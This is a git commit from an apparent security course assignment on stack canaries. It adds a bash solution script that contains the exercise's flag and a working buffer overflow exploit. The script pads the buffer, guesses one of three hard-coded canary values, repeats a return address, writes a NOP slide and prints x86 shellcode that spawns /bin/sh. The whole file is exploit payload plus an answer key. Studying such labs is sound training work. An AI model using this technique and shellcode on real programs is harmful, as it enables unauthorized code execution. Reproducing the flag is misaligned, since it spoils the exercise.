[Assignment-6] solution task 7 (stack canaries)

2024-06-23 23:01:12 +02:00 · 2024-06-23 23:01:12 +02:00 · 688fdcd404
commit 688fdcd404
parent 8ab148a95f
1 changed files with 28 additions and 0 deletions
--- a/2/fake_canary/solution.sh
+++ b/2/fake_canary/solution.sh
@ -0,0 +1,28 @@
+#!/bin/bash
+
+# flag{CANARY_IS_ALSO_AN_ISLAND}
+
+######### Exploit #########
+# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
+# Note: Only canaries without null bytes can be used due to the use of strcpy.
+case $(( RANDOM % 3 )) in
+    0)
+        printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70"
+        ;;
+    1)
+        printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b"
+        ;;
+    2)
+        printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08"
+        ;;
+esac
+
+# Step 2: Fill the buffer with a candidate return address
+printf "\x10\xd6\xff\xff%.0s" {1..30}
+
+# Step 3: Write a lot of NOPs to stdout as a slide for the shellcode
+printf "\x90%.0s" {1..2000}
+
+# Step 4: Write the provided shellcode to stdout
+printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
+###########################